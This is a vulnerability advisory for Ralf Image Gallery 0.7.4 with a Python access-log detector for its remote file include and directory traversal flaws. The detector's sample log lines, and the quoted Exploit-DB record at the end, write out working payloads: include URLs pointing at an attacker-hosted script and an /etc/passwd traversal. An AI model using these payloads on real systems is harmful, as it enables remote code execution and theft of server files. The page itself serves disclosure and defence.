Vendor: Ralf Image Gallery
Discovered by: 'Aesthetico'
CVSS: 7.5 (HIGH)
Title: Multiple Remote File Include and directory traversal
CWE: 22
Product Name: Ralf Image Gallery
Affected Version From: 0.7.4
Affected Version To: 0.7.4
Patch Exists: YES
Related CVE: CVE-2006-3117
CPE: o:rig:rig
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2006

Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory traversal Vulnerabilities

Ralf Image Gallery (RIG) is prone to multiple remote file include and directory traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker can exploit these issues to execute arbitrary remote PHP code in the context of the webserver process, or to view sensitive files on the affected computer.

Mitigation:

Upgrade to version 0.7.5 or later.
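For teams that cannot upgrade immediately, the two request parameters named in this advisory are easy to watch for in web-server access logs. The following is an added example written for this page, not code from the Exploit-DB record or from RIG itself. It assumes Apache-style Common Log Format lines; the sample log lines, client addresses and the `rfi-host.example` hostname are constructed placeholders. It generalises slightly beyond the advisory: every query parameter is checked for a remote URL scheme or a traversal marker, and a finding is marked `known_sink` only when the parameter is one of the two the advisory identifies.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters the advisory above names as the vulnerable include/file-read sinks in RIG <= 0.7.4.
KNOWN_SINK_PARAMS = frozenset({"dir_abs_src", "dir_abs_admin_src"})

# Minimal Common Log Format parser (assumed field layout; adapt to your server's LogFormat).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
# Any URL scheme in a value that reaches include() indicates a remote file include attempt.
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Parent-directory hops (either slash style) or an embedded NUL used to cut off an appended suffix.
TRAVERSAL_RE = re.compile(r"\.\.[\\/]|\x00")


def classify_value(value: str) -> Optional[str]:
    """Return 'rfi', 'traversal' or None for a single query value that parse_qs already decoded once."""
    # A second unquote catches double-encoded payloads such as %252e%252e%252f.
    decoded = unquote(value)
    if SCHEME_RE.match(decoded):
        return "rfi"
    if TRAVERSAL_RE.search(decoded):
        return "traversal"
    return None


def scan_request_target(target: str) -> list:
    """Inspect every query parameter of one request target and report suspicious values."""
    findings = []
    parts = urlsplit(target)
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            kind = classify_value(value)
            if kind:
                findings.append({
                    "path": parts.path,
                    "param": name,
                    "kind": kind,
                    # True when the parameter is one the advisory identifies as a vulnerable sink.
                    "known_sink": name in KNOWN_SINK_PARAMS,
                })
    return findings


def scan_log(lines) -> list:
    """Run scan_request_target over access-log lines, attaching client, status and timestamp."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected log format
        for finding in scan_request_target(m["target"]):
            finding.update(client=m["client"], status=int(m["status"]), ts=m["ts"])
            results.append(finding)
    return results


# Constructed sample log lines (not real traffic); addresses and hostnames are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Jun/2006:10:00:00 +0000] "GET /check_entry.php?dir_abs_src=http://rfi-host.example/yourscript.txt? HTTP/1.0" 200 512',
    '203.0.113.7 - - [22/Jun/2006:10:00:01 +0000] "GET /check_entry.php?dir_abs_src=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1430',
    '203.0.113.7 - - [22/Jun/2006:10:00:02 +0000] "GET /admin_album.php?dir_abs_admin_src=http://rfi-host.example/yourscript.txt? HTTP/1.0" 200 310',
    '198.51.100.4 - - [22/Jun/2006:10:01:00 +0000] "GET /check_entry.php?dir_abs_src=albums/holiday HTTP/1.0" 200 2048',
    '203.0.113.7 - - [22/Jun/2006:10:02:00 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 310',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit with `known_sink` set to true on a host still running 0.7.4 should be treated as a probable compromise attempt, and the `status` field tells you whether the request succeeded. Log detection is a stop-gap; the fix remains the upgrade above, since the application itself must stop passing these values to include() and file reads.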
Source (Exploit-DB raw data):

Title: Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory traversal Vulnerabilities
-----------------------------------------------------------------
Vendor: RIG is developed and maintained by Le R'alf
URL: http://rig.powerpulsar.com/
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------

Exploitation:
-----------------------------------------------------------------

/check_entry.php?dir_abs_src=http://www.yourspace.com/yourscript.php?
/check_entry.php?dir_abs_src=../../../../../../../../../etc/passwd%00
/admin_album.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_image.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_translate.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-22]